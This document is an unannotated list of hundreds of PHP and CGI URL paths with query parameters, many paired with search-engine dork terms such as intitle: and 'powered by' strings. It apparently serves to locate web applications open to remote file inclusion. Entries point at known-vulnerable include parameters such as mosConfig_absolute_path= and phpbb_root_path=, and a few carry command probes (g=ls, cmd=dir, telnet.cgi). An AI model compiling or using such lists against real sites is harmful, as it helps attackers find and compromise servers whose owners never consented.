.php?lest="&#13;
.php?east="&#13;
.gov.br/index.php?arquivo=&#13;
index.php?ver=&#13;
/contenido/classes/class.inuse.php&#13;
news.php?CONFIG[script_path]=&#13;
index.php?vpagina=&#13;
index.php?arq=&#13;
index.php?pg_ID=&#13;
index.php?pg=&#13;
home.php?page=&#13;
*/newbb/print.php?forum=*topic_id=*"&#13;
*/newbb_plus/*="&#13;
*/news/archive.php?op=*year=*month=*"&#13;
.php?abrir="&#13;
.php?act="&#13;
.php?action="&#13;
.php?ad="&#13;
.php?archive="&#13;
.php?area="&#13;
.php?article="&#13;
.php?b="&#13;
*/tsep/include/colorswitch.php?tsep_config[absPath]=*"&#13;
.php?back="&#13;
.php?base="&#13;
.php?basedir="&#13;
.php?bbs="&#13;
.php?board_no="&#13;
.php?body="&#13;
.php?c="&#13;
.php?cal_dir="&#13;
.php?cat="&#13;
/include/init.inc.php?CPG_M_DIR="&#13;
/includes/mx_functions_ch.php?phpbb_root_path="&#13;
/modules/MyGuests/signin.php?_AMGconfig[cfg_serverpath]="&#13;
.php?_REQUEST=&amp;_REQUEST[option]=com_content&amp;_REQUEST[Itemid]=1&amp;GLOBALS=&amp;mosConfig_absolute_path="&#13;
.php?subd="&#13;
.php?subdir="&#13;
.php?category="&#13;
.php?choice="&#13;
.php?class="&#13;
.php?club_id="&#13;
.php?cod.tipo="&#13;
.php?cod="&#13;
.php?conf="&#13;
.php?configFile="&#13;
.php?cont="&#13;
.php?corpo="&#13;
.php?cvsroot="&#13;
.php?d="&#13;
.php?da="&#13;
.php?date="&#13;
.php?debug="&#13;
.php?debut="&#13;
.php?default="&#13;
.php?destino="&#13;
.php?dir="&#13;
.php?display="&#13;
.php?file_id="&#13;
.php?file="&#13;
.php?filepath="&#13;
.php?flash="&#13;
.php?folder="&#13;
.php?for="&#13;
.php?form="&#13;
.php?formatword="&#13;
.php?funcao="&#13;
.php?function="&#13;
.php?g="&#13;
.php?get="&#13;
.php?go="&#13;
.php?gorumDir="&#13;
.php?goto="&#13;
.php?h="&#13;
.php?headline="&#13;
.php?i="&#13;
.php?inc="&#13;
.php?include="&#13;
.php?includedir="&#13;
.php?inter="&#13;
.php?itemid="&#13;
.php?j="&#13;
.php?join="&#13;
.php?jojo="&#13;
.php?l="&#13;
.php?lan="&#13;
.php?lang="&#13;
.php?link="&#13;
.php?load="&#13;
.php?loc="&#13;
.php?m="&#13;
.php?main="&#13;
.php?meio.php="&#13;
.php?meio="&#13;
.php?menu="&#13;
.php?menuID="&#13;
.php?mep="&#13;
.php?month="&#13;
.php?mostra="&#13;
.php?n="&#13;
.php?name="&#13;
.php?nav="&#13;
.php?new="&#13;
.php?news="&#13;
.php?next="&#13;
.php?nextpage="&#13;
.php?o="&#13;
.php?op="&#13;
.php?open="&#13;
.php?option="&#13;
.php?origem="&#13;
.php?Page_ID="&#13;
.php?pageurl="&#13;
.php?para="&#13;
.php?part="&#13;
.php?pg="&#13;
.php?pid="&#13;
.php?place="&#13;
.php?play="&#13;
.php?plugin="&#13;
.php?pm_path="&#13;
.php?pollname="&#13;
.php?post="&#13;
.php?pr="&#13;
.php?prefix="&#13;
.php?prefixo="&#13;
.php?q="&#13;
.php?redirect="&#13;
.php?ref="&#13;
.php?refid="&#13;
.php?regionId="&#13;
.php?release_id="&#13;
.php?release="&#13;
.php?return="&#13;
.php?root="&#13;
.php?S="&#13;
.php?searchcode_id="&#13;
.php?sec="&#13;
.php?secao="&#13;
.php?sect="&#13;
.php?sel="&#13;
.php?server="&#13;
.php?servico="&#13;
.php?sg="&#13;
.php?shard="&#13;
.php?show="&#13;
.php?sid="&#13;
.php?site="&#13;
.php?sourcedir="&#13;
.php?start="&#13;
.php?storyid="&#13;
.php?str="&#13;
.php?subject="&#13;
.php?sufixo="&#13;
.php?systempath="&#13;
.php?t="&#13;
.php?task="&#13;
.php?teste="&#13;
.php?theme_dir="&#13;
.php?thread_id="&#13;
.php?tid="&#13;
.php?title="&#13;
.php?to="&#13;
.php?topic_id="&#13;
.php?type="&#13;
.php?u="&#13;
.php?url="&#13;
.php?urlFrom="&#13;
.php?v="&#13;
.php?var="&#13;
.php?vi="&#13;
.php?view="&#13;
.php?visual="&#13;
.php?wPage="&#13;
.php?y="&#13;
/components/com_forum/download.php?phpbb_root_path= com_forum&#13;
[Script Path]/admin/index.php?o= admin/index.php"&#13;
/admin/index.php?o= admin/index.php"&#13;
index.php?menu=deti&amp;page= index.php?menu=deti&amp;page"&#13;
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= intitle:Newswriter&#13;
/classes/adodbt/sql.php?classes_dir= "index2.php?option=rss"&#13;
components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration&#13;
index.php?RP_PATH= reviewpost&#13;
index.php?pagename= phpquiz&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= /com_remository/&#13;
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= com_extcalendar&#13;
components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path= "com_phpshop"&#13;
/tools/send_reminders.php?includedir= day.php?date=&#13;
SQuery/lib/gore.php?libpath= "/SQuery/"&#13;
m2f/m2f_phpbb204.php?m2f_root_path= /m2f_usercp.php?&#13;
wamp_dir/setup/yesno.phtml?no_url= "setup"&#13;
components/com_forum/download.php?phpbb_root_path= "com_forum"&#13;
index.php?p= "/index.php?p=*.php"&#13;
index.php?pag= "/index.php?pag=*.php"&#13;
template.php?page= "/template.php?page=*.php"&#13;
main.php?page= "/main.php?page=*.php"&#13;
index2.php?pag= "/index2.php?pag=*.php"&#13;
home.php?pag= "/home.php?pag=*.php"&#13;
index.php?page= "/index.php?page=*.php"&#13;
default.php?page= "/default.php?page=*.php"&#13;
inc/cmses/aedatingCMS.php?dir[inc]= "flashchat"&#13;
/modules/vwar/admin/admin.php?vwar_root= vwar&#13;
bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path= forum&#13;
encapscms_PATH/core/core.php?root= encapscms_PATH&#13;
inc/session.php?sessionerror=0&amp;lang= inc&#13;
path/index.php?function=custom&amp;custom= path&#13;
[MyAlbum_DIR]/language.inc.php?langs_dir= [MyAlbum_DIR]&#13;
/inc/irayofuncs.php?irayodirhack= "/inc/"&#13;
index.php?function=custom&amp;custom= custom&#13;
cyberfolio/portfolio/msg/view.php?av= cyberfolio&#13;
/modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT= CFG_PHPGIGGLE_ROOT&#13;
*mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=&#13;
*pivot/modules/module_db.php?pivot_path=&#13;
*inc/header.php/step_one.php?server_inc=&#13;
*inst/index.php?lng=../../include/main.inc&amp;G_PATH=&#13;
*inc/pipe.php?HCL_path=&#13;
*include/new-visitor.inc.php?lvc_include_dir=&#13;
*includes/header.php?systempath=&#13;
*support/mailling/maillist/inc/initdb.php?absolute_path=&#13;
*coppercop/theme.php?THEME_DIR=&#13;
*zentrack/index.php?configFile=&#13;
*include/write.php?dir=&#13;
include/new-visitor.inc.php?lvc_include_dir=&#13;
includes/header.php?systempath=&#13;
support/mailling/maillist/inc/initdb.php?absolute_path=&#13;
coppercop/theme.php?THEME_DIR=&#13;
becommunity/community/index.php?pageurl=&#13;
shoutbox/expanded.php?conf=&#13;
agendax/addevent.inc.php?agendax_path=&#13;
myPHPCalendar/admin.php?cal_dir=&#13;
yabbse/Sources/Packages.php?sourcedir=&#13;
zboard/zboard.php&#13;
path_of_cpcommerce/_functions.php?prefix&#13;
dotproject/modules/tasks/viewgantt.php?root_dir=&#13;
My_eGery/public/displayCategory.php?basepath=&#13;
modules/My_eGery/public/displayCategory.php?basepath=&#13;
modules/4nAlbum/public/displayCategory.php?basepath=&#13;
modules/coppermine/themes/default/theme.php?THEME_DIR=&#13;
modules/agendax/addevent.inc.php?agendax_path=&#13;
modules/xoopsgery/upgrade_album.php?GERY_BASEDIR=&#13;
modules/xgery/upgrade_album.php?GERY_BASEDIR=&#13;
modules/coppermine/include/init.inc.php?CPG_M_DIR=&#13;
modules/mod_mainmenu.php?mosConfig_absolute_path=&#13;
pivot/modules/module_db.php?pivot_path=&#13;
library/editor/editor.php?root=&#13;
library/lib.php?root=&#13;
e107/e107_handlers/secure_img_render.php?p=&#13;
main.php?x=&#13;
main.php?page=&#13;
*default.php?page=&#13;
*default.php?body=&#13;
default.php?page=&#13;
*index.php?url=&#13;
*index.php?arquivo=&#13;
index.php?meio.php=&#13;
index.php?include=&#13;
index.php?open=&#13;
index.php?visualizar=&#13;
index.php?pagina=&#13;
index.php?inc=&#13;
index.php?page=&#13;
index.php?pag=&#13;
index.php?p=&#13;
index.php?content=&#13;
index.php?cont=&#13;
index.php?c=&#13;
index.php?meio=&#13;
index.php?x=&#13;
index.php?cat=&#13;
index.php?site=&#13;
index.php?configFile=&#13;
index.php?action=&#13;
index.php?do=&#13;
index2.php?x=&#13;
Index.php?id=&#13;
index2.php?content=&#13;
template.php?pagina&#13;
inc/step_one_tables.php?server_inc=&#13;
phpshop/index.php?base_dir=&#13;
admin.php?cal_dir=&#13;
path_of_cpcommerce/_functions.php?prefix=&#13;
contacts.php?cal_dir=&#13;
convert-date.php?cal_dir=&#13;
album_portal.php?phpbb_root_path=&#13;
mainfile.php?MAIN_PATH=&#13;
dotproject/modules/files/index_table.php?root_dir=&#13;
html/affich.php?base=&#13;
gery/init.php?HTTP_POST_VARS=&#13;
pm/lib.inc.php?pm_path=&#13;
ideabox/include.php?gorumDir=&#13;
modules/tasks/viewgantt.php?root_dir=&#13;
cgi-bin/index.cgi?page=&#13;
cgi-bin/awstats.pl?update=1&amp;logfile=&#13;
cgi-bin/awstats/awstats.pl?configdir&#13;
cgi-bin/ikonboard.cgi&#13;
cgi-bin/acart/acart.pl?&amp;page=&#13;
cgi-bin/quikstore.cgi?category=&#13;
cgi-bin/ubb/ubb.cgi?g=&#13;
cgi-bin/hinsts.pl?&#13;
cgi-bin/bp/bp-lib.pl?g=&#13;
ccbill/whereami.cgi?g=ls&#13;
cgi-bin/telnet.cgi&#13;
cgi-bin/1/cmd.cgi&#13;
encore/forumcgi/display.cgi?preftemp=temp&amp;page=anonymous&amp;file=&#13;
cgi-sys/guestbook.cgi?user=cpanel&amp;template=&#13;
account.php?action= account.php?action=&#13;
account.php?action= iurl:"account.php?action="&#13;
account.php?action= iurl:".php?action="&#13;
account.php?action= .php?action=&#13;
accounts.php?command= .php?command="&#13;
addmedia.php?factsfile[$LANGUAGE]= phpGedView&#13;
.php?p="&#13;
announcements.php?phpraid_dir= "phpraid"&#13;
announcements.php?phpraid_dir= "phpraid signup"&#13;
announcements.php?phpraid_dir= php raid&#13;
announcements.php?phpraid_dir= phpraid&#13;
announcements.php?phpraid_dir= phpraid signup&#13;
arg.php?arg= .php?arg=&#13;
args.php?arg= .php?arg=&#13;
atom.php5?page= .php5?id=&#13;
auto.php?inc= .php?inc="&#13;
auto.php?page= auto.php?page=&#13;
base.php?f1= base.php?f1="&#13;
base.php?f1= .php?f1="&#13;
board.php?see= board.php?see="&#13;
board.php?see= .php?see="&#13;
book.php5?page= php5?page=&#13;
/calendar.php?l= calendar.php?l="&#13;
/calendar.php?l= calendar.php?l=&#13;
/calendar.php?p= calendar.php?p="&#13;
/calendar.php?p= calendar.php?p=&#13;
/calendar.php?pg= calendar.php?pg="&#13;
/calendar.php?pg= calendar.php?pg=&#13;
/calendar.php?s= calendar.php?s="&#13;
/calendar.php?s= calendar.php?s=&#13;
/addpost_newpoll.php?addpoll=preview&amp;thispath= /ubbthreads/"&#13;
/addpost_newpoll.php?addpoll=preview&amp;thispath= /ubbthreads/&#13;
/addpost_newpoll.php?addpoll=preview&amp;thispath= "/ubbthreads/"&#13;
/addpost_newpoll.php?addpoll=preview&amp;thispath= "ubbthreads"&#13;
/addpost_newpoll.php?addpoll=preview&amp;thispath= ubbthreads&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "com_remository"&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "com_remository&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= com_remository&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= index.php?option=com_remository&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= "Mambo"&#13;
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path= Mambo&#13;
/administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path= com_serverstat&#13;
/administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path= "com_serverstat"&#13;
canal.php?meio= .php?meio="&#13;
/classes/adodbt/sql.php?classes_dir= "adobt"&#13;
/classes/adodbt/sql.php?classes_dir= adobt&#13;
/classes/adodbt/sql.php?classes_dir= adobt&#13;
/classified_right.php?language_dir= "classified.php"&#13;
/classified_right.php?language_dir= classified.php&#13;
/classified_right.php?language_dir= classified.php phpbazar&#13;
/classified_right.php?language_dir= "phpbazar"&#13;
/classified_right.php?language_dir= phpbazar&#13;
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "phpCOIN"&#13;
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= phpCOIN&#13;
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "phpCOIN 1.2.3"&#13;
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= phpCOIN 1.2.3&#13;
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= "powered by phpCOIN 1.2.3"&#13;
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= powered by phpCOIN 1.2.3&#13;
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration&#13;
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= "com_extended_registration"&#13;
/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path= com_extended_registration&#13;
/components/com_facileforms/facileforms.frame.php?ff_compath= com_facileforms"&#13;
/components/com_facileforms/facileforms.frame.php?ff_compath= "com_facileforms"&#13;
/components/com_facileforms/facileforms.frame.php?ff_compath= com_facileforms&#13;
components/com_performs/performs.php?mosConfig_absolute_path= com_performs&#13;
components/com_performs/performs.php?mosConfig_absolute_path= "com_performs"&#13;
/components/com_zoom/includes/database.php?mosConfig_absolute_path= "com_zoom"&#13;
/components/com_zoom/includes/database.php?mosConfig_absolute_path= com_zoom&#13;
/components/com_zoom/includes/database.php?mosConfig_absolute_path= "index.php?option="com_zoom"&#13;
content.php?page= "content.php?page=*.php"&#13;
/embed/day.php?path= "Calendar"&#13;
/embed/day.php?path= Calendar&#13;
/embed/day.php?path= intitle:"Login to Calendar"&#13;
/embed/day.php?path= "Login to Calendar"&#13;
/embed/day.php?path= Login to Calendar&#13;
/embed/day.php?path= "WebCalendar"&#13;
/embed/day.php?path= WebCalendar&#13;
enc/content.php?Home_Path= "doodle"&#13;
enc/content.php?Home_Path= doodle&#13;
enc/content.php?Home_Path= "doodle cart"&#13;
enc/content.php?Home_Path= doodle cart&#13;
enc/content.php?Home_Path= "powered by doodle cart"&#13;
enc/content.php?Home_Path= powered by doodle cart&#13;
/header.php?abspath= "MobilePublisherPHP"&#13;
/header.php?abspath= MobilePublisherPHP&#13;
impex/ImpExData.php?systempath= intext:powered by vbulletin&#13;
impex/ImpExData.php?systempath= powered by vbulletin&#13;
impex/ImpExData.php?systempath= "vbulletin"&#13;
impex/ImpExData.php?systempath= vbulletin&#13;
/includes/dbal.php?eqdkp_root_path= "EQdkp"&#13;
/includes/dbal.php?eqdkp_root_path= EQdkp&#13;
/includes/dbal.php?eqdkp_root_path= "powered by EQdkp"&#13;
/includes/dbal.php?eqdkp_root_path= powered by EQdkp&#13;
/includes/kb_constants.php?module_root_path= "Base"&#13;
/includes/kb_constants.php?module_root_path= Base&#13;
/includes/kb_constants.php?module_root_path= "Knowledge"&#13;
/includes/kb_constants.php?module_root_path= Knowledge&#13;
/includes/kb_constants.php?module_root_path= "Knowledge Base"&#13;
/includes/kb_constants.php?module_root_path= Knowledge Base&#13;
/includes/kb_constants.php?module_root_path= "Powered by Knowledge Base"&#13;
/includes/kb_constants.php?module_root_path= Powered by Knowledge Base&#13;
index1.php?= "index1.php?="&#13;
index1.php?= index1.php?=&#13;
index1.php?= "index1.php?=*.php?&#13;
index2.php?= "index2.php?="&#13;
index2.php?= index2.php?=&#13;
index2.php?= "index2.php?=*.php?"&#13;
index.php?body= index.php?body=&#13;
index.php?body= "index.php?body="&#13;
index.php?go1= index.php?go1=&#13;
index.php?go1= "index.php?go1="&#13;
index.php?go= "index.php?go="&#13;
index.php?go= index.php?go=&#13;
index.php?pageurl= "index.php?pageurl="&#13;
index.php?pageurl= "index.php?pageurl=*.php"&#13;
index.php?pageurl= index.php?pageurl=*.php&#13;
index.php?pageurl= "index.php?pageurl=*.php&#13;
index.php?pagina1= "index.php?pagina1="&#13;
index.php?pagina1= index.php?pagina1=&#13;
index.php?pagina= "index.php?pagina="&#13;
index.php?pagina= "index.php?pagina=*.php"&#13;
index.php?site1= index.php?site1=&#13;
index.php?site1= "index.php?site1="&#13;
index.php?site= "index.php?site="&#13;
index.php?site= index.php?site=&#13;
index.php?var1= "index.php?var1="&#13;
index.php?var1= index.php?var1=&#13;
index.php?var2= index.php?var2=&#13;
index.php?var= index.php?va21=&#13;
index.php?var= index.php?var=&#13;
index.php?var= "index.php?var1="&#13;
index.php?var= index.php?var1=&#13;
index.php?var= "index.php?var2="&#13;
index.php?var= index.php?var2=&#13;
index.php?var= "index.php?var=*.php"&#13;
index.php?var= index.php?var=*.php&#13;
/login.php?dir= login.php?dir=&#13;
/login.php?dir= "login.php?dir="&#13;
/login.php?dir= login.php?dir=&#13;
main.php?id= "main.php?id=*.php"&#13;
/main.php?sayfa= "main.php?sayfa="&#13;
/main.php?sayfa= main.php?sayfa=&#13;
/mcf.php?content= mcf.php"&#13;
mcf.php?content= mcf.php"&#13;
mcf.php?content= "mcf.php"&#13;
mcf.php?content= mcf.php&#13;
/modules/TotalCalendar/about.php?inc_dir= /TotalCalendar&#13;
/modules/TotalCalendar/about.php?inc_dir= /TotalCalendar&#13;
/modules/TotalCalendar/about.php?inc_dir= "TotalCalendar"&#13;
/modules/TotalCalendar/about.php?inc_dir= TotalCalendar&#13;
/modules/vwar/admin/admin.php?vwar_root= "vwar"&#13;
/modules/vwar/admin/admin.php?vwar_root= vwar&#13;
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= "index.php?id="&#13;
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= index.php?id=&#13;
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= "phpwcms/index.php?id="&#13;
phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root= phpwcms/index.php?id=&#13;
skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer"&#13;
skins/advanced/advanced1.php?pluginpath[0]= Sabdrimer&#13;
skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"&#13;
skins/advanced/advanced1.php?pluginpath[0]= Sabdrimer CMS&#13;
skins/advanced/advanced1.php?pluginpath[0]= skins/advanced/advanced1.php?pluginpath[0]= "CMS"&#13;
skins/advanced/advanced1.php?pluginpath[0]= skins/advanced/advanced1.php?pluginpath[0]= "Sabdrimer CMS"&#13;
/skin/zero_vote/error.php?dir= "skin/zero_vote/error.php"&#13;
/skin/zero_vote/error.php?dir= skin/zero_vote/error.php&#13;
/sources/functions.php?CONFIG[main_path]= "(Powered By ScozNews)"&#13;
/sources/functions.php?CONFIG[main_path]= "Powered By ScozNews"&#13;
/sources/functions.php?CONFIG[main_path]= (Powered By ScozNews)&#13;
/sources/functions.php?CONFIG[main_path]= Powered By ScozNews&#13;
/sources/functions.php?CONFIG[main_path]= "ScozNews"&#13;
/sources/functions.php?CONFIG[main_path]= ScozNews&#13;
/sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]= "Aardvark"&#13;
/sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]= Aardvark&#13;
/sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]= "Aardvark TopSites"&#13;
/sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]= Aardvark TopSites&#13;
/sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]= "Powered By Aardvark Topsites PHP 4.2.2"&#13;
/sources/join.php?FORM[url]=owned&amp;CONFIG[captcha]=1&amp;CONFIG[path]= Powered By Aardvark Topsites PHP 4.2.2&#13;
/sources/template.php?CONFIG[main_path]= "(Powered By ScozNews)"&#13;
/sources/template.php?CONFIG[main_path]= (Powered By ScozNews)&#13;
/sources/template.php?CONFIG[main_path]= Powered By ScozNews&#13;
/sources/template.php?CONFIG[main_path]= "ScozNews"&#13;
/sources/template.php?CONFIG[main_path]= ScozNews&#13;
/surveys/survey.inc.php?path= surveys&#13;
/surveys/survey.inc.php?path= "surveys"&#13;
/tags.php?BBCodeFile= intitle:"Tagger LE"&#13;
/tags.php?BBCodeFile= intitle:"Tagger LE" tags.php&#13;
/tags.php?BBCodeFile= "Tagger LE"&#13;
/tags.php?BBCodeFile= Tagger LE&#13;
/tags.php?BBCodeFile= "tags.php"&#13;
/tags.php?BBCodeFile= tags.php&#13;
/templates/headline_temp.php?nst_inc= intitle:fusion:news:management&#13;
/templates/headline_temp.php?nst_inc= ‘fusion"&#13;
/templates/headline_temp.php?nst_inc= "fusion"&#13;
/templates/headline_temp.php?nst_inc= fusion&#13;
/templates/headline_temp.php?nst_inc= fusion:news:management:system&#13;
/templates/headline_temp.php?nst_inc= "management"&#13;
/templates/headline_temp.php?nst_inc= management&#13;
/templates/headline_temp.php?nst_inc= "news"&#13;
/templates/headline_temp.php?nst_inc= news&#13;
/templates/headline_temp.php?nst_inc= "system"&#13;
/templates/headline_temp.php?nst_inc= system&#13;
/tools/send_reminders.php?includedir= "day.php?date="&#13;
/tools/send_reminders.php?includedir= day.php?date=&#13;
/ws/get_events.php?includedir= /WebCalendar/&#13;
/ws/get_events.php?includedir= "/WebCalendar/"&#13;
/ws/get_events.php?includedir= "WebCalendar"&#13;
/zipndownload.php?PP_PATH= "PhotoPost"&#13;
/zipndownload.php?PP_PATH= PhotoPost&#13;
/zipndownload.php?PP_PATH= "PhotoPostP"&#13;
/zipndownload.php?PP_PATH= "PhotoPost PHP"&#13;
/zipndownload.php?PP_PATH= "PhotoPost PHP 4.6"&#13;
/zipndownload.php?PP_PATH= PhotoPost PHP 4.6&#13;
/zipndownload.php?PP_PATH= "Powered by: PhotoPost PHP 4.6?&#13;
/zipndownload.php?PP_PATH= Powered by: PhotoPost PHP 4.6&#13;
cmd.php?arg= .php?arg=&#13;
/codebb/lang_select?phpbb_root_path= codebb&#13;
/codebb/lang_select?phpbb_root_path= codebb 1.1b3&#13;
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rs gery&#13;
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rsgery&#13;
components/com_rsgery/rsgery.html.php?mosConfig_absolute_path= rsgery.php&#13;
content.php?inc= .php?inc="&#13;
content.php?seite= content.php?seite=&#13;
content.php?seite= .php?seite=&#13;
dbase.php?action= dbase.php&#13;
dbase.php?action= dbase.php?action=&#13;
dbase.php?action= .php?action=&#13;
default.php?arquivo= .php?arquivo=&#13;
default.php?vis= .php?vis="&#13;
define.php?term= .php?term="&#13;
detail.php?prod= detail.php?prod="&#13;
detail.php?prod= .php?prod="&#13;
details.php?loc= details.php?loc=&#13;
details.php?loc= .php?loc=&#13;
directions.php?loc= directions.php?loc=&#13;
direct.php?loc= direct.php?loc=&#13;
display.php?f= display.php?f=&#13;
display.php?file= display.php?file=&#13;
display.php?lang= display.php?lang=&#13;
display.php?l= display.php?l=&#13;
display.php?ln= display.php?ln=&#13;
display.php?pag= display.php?pag=&#13;
display.php?page= display.php?page="&#13;
display.php?page= .php?page="&#13;
display.php?page=&amp;lang= display.php?page="&#13;
display.php?page=&amp;lang= .php?page="&#13;
display.php?p= display.php?p=&#13;
display.php?pg= display.php?pg=&#13;
display.php?s= display.php?s=&#13;
display.php?table= display.php?table=&#13;
display.php?table= .php?table=&#13;
download.php?sub= "download.php?sub="&#13;
download.php?sub= download.php?sub=&#13;
eng.php?img= eng.php?img=&#13;
eng.php?img= .php?img=&#13;
/exibir.php?arquivo= .php?arquivo=&#13;
experts.php?sub= "experts.php?sub="&#13;
experts.php?sub= experts.php?sub=&#13;
forum.php?seite= .php?seite=&#13;
frag.php?exec= frag.php"&#13;
frag.php?exec= frag.php?exec="&#13;
frag.php?exec= .php?exec="&#13;
frame.php?loc= .php?loc="&#13;
galerie.php?do= .php?do="&#13;
glossary.php?term= .php?term="&#13;
handlinger.php?vis= .php?vis="&#13;
/help_text_vars.php?cmd=dir&amp;PGV_BASE_DIRECTORY= PHP Ged View&#13;
/help_text_vars.php?cmd=dir&amp;PGV_BASE_DIRECTORY= PHP GedView&#13;
/help_text_vars.php?cmd=dir&amp;PGV_BASE_DIRECTORY= PHPGedView&#13;
/help_text_vars.php?cmd=dir&amp;PGV_BASE_DIRECTORY= PHPGedView &lt;= 3.3.7&#13;
home1.php?ln= .php?ln=&#13;
home2.php?ln= .php?ln=&#13;
home.php?a= home.php?a="&#13;
home.php?a= .php?a="&#13;
home.php?act= "home.php?act="&#13;
home.php?act= home.php?act=&#13;
home.php?arg= .php?arg=&#13;
home.php?func= .php?func="&#13;
home.php?i= "home.php?i="&#13;
home.php?i= home.php?i=&#13;
home.php?inc= "home.php?inc="&#13;
home.php?inc= home.php?inc=&#13;
home.php?ln= .php?ln=&#13;
home.php?ltr= .php?ltr="&#13;
home.php?sit= .php?sit="&#13;
home.php?table= .php?table=&#13;
image.php?img= image.php?img=&#13;
image.php?img= .php?img=&#13;
img.php?loc= img.php?loc="&#13;
img.php?loc= .php?loc="&#13;
inc.php?inc= .php?inc="&#13;
index1.php?arg= .php?arg=&#13;
index1.php?arq= .php?arq=&#13;
index1.php?func= .php?func="&#13;
index1.php?inc= .php?inc="&#13;
index1.php?lk= .php?lk="&#13;
/index1.php?ln= .php?ln=&#13;
index1.php?ltr= .php?ltr="&#13;
index1.php?mid= index1.php?mid=&#13;
index1.php?page= index1.php?page="&#13;
index1.php?p= .php?p="&#13;
index1.php?p= .php?pag="&#13;
index1.php?p= .php?page="&#13;
index1.php?p= .php?pg="&#13;
index1.php?s= index1.php?s="&#13;
index1.php?show= index1.php?show="&#13;
index1.php?show= .php?show="&#13;
index1.php?table= .php?table=&#13;
index2.php?arg= .php?arg=&#13;
index2.php?arq= .php?arq=&#13;
index2.php?c= index2.php?c="&#13;
index2.php?c= .php?c="&#13;
index2.php?cont= index2.php?cont="&#13;
index2.php?cont= .php?cont="&#13;
index2.php?content= index2.php?cont="&#13;
index2.php?content= index2.php?content="&#13;
index2.php?content= .php?content="&#13;
index2.php?content= index2.php?content=&#13;
index2.php?content= .php?content=&#13;
index2.php?i= /index2.php?i=&#13;
index2.php?inc= .php?inc="&#13;
index2.php?l= .php?l="&#13;
index2.php?lg= index.php?lg="&#13;
index2.php?lk= .php?lk="&#13;
index2.php?ln= index.php?ln="&#13;
index2.php?ln= .php?ln="&#13;
index2.php?lng= index.php?lng="&#13;
index2.php?loca= index2.php?loca=&#13;
index2.php?loca= .php?loca=&#13;
index2.php?meio= .php?meio=&#13;
index2.php?s= index2.php?s="&#13;
index2.php?s= .php?s="&#13;
index2.php?table= .php?table=&#13;
index2.php?x= index2.php?x=&#13;
index2.php?x= .php?x=&#13;
index.php3?act= index.php3?act=&#13;
index.php3?act= .php3?act=&#13;
index.php3?act= .php3?act="&#13;
index.php3?file= .php3?f="&#13;
index.php3?file= .php3?file="&#13;
index.php3?id= index.php3?id=&#13;
index.php3?i= index.php3?i=&#13;
index.php3?lang= index.php3?lang=&#13;
index.php3?l= index.php3?l=&#13;
index.php3?page= index.php3?page=&#13;
index.php3?pag= index.php3?pag=&#13;
index.php3?p= index.php3?p="&#13;
index.php3?p= index.php3?pag="&#13;
index.php3?p= index.php3?page="&#13;
index.php3?p= index.php3?pg="&#13;
index.php3?pg= index.php3?pg=&#13;
index.php3?p= index.php3?p=&#13;
index.php3?s= index.php3?s="&#13;
index.php3?s= index.php3?s=&#13;
index.php3?s= .php3?s=&#13;
index.php3?s= .php3?s="&#13;
index.php4?lang= index.php4?lang="&#13;
index.php4?lang= index.php4?lang="&#13;
index.php4?lang= .php4?lang=&#13;
index.php4?lang= .php4?lang="&#13;
index.php4?lang= .php4?lang=&#13;
index.php5?lang= index.php5?lang="&#13;
index.php5?lang= index.php5?lang=&#13;
index.php5?lang= .php5?lang="&#13;
index.php?a= index.php?a="&#13;
index.php?a= .php?a="&#13;
index.php?acao= index.php?acao=&#13;
index.php?acao= .php?acao=&#13;
index.php?act= "index.php?act="&#13;
index.php?act= index.php?act=&#13;
index.php?action= index.php?action="&#13;
index.php?action= .php?action="&#13;
index.php?arg= index.php?arg=&#13;
index.php?arg= .php?arg=&#13;
index.php?arq= index.php?arq=&#13;
index.php?arq= .php?arq=&#13;
index.php?arquivo= .php?arquivo=&#13;
index.php?ba= index.php?ba="&#13;
index.php?b= index.php?b="&#13;
index.php?bas= index.php?bas="&#13;
index.php?bas= .php?bas="&#13;
index.php?cal= index.php?cal=&#13;
index.php?cal= "index.php?cal="&#13;
index.php?cal= ".php?cal="&#13;
index.php?c= index.php?c="&#13;
index.php?cal= .php?cal=&#13;
index.php?c= index.php?c=&#13;
index.php?c= "index.php?c="&#13;
index.php?c= ".php?c="&#13;
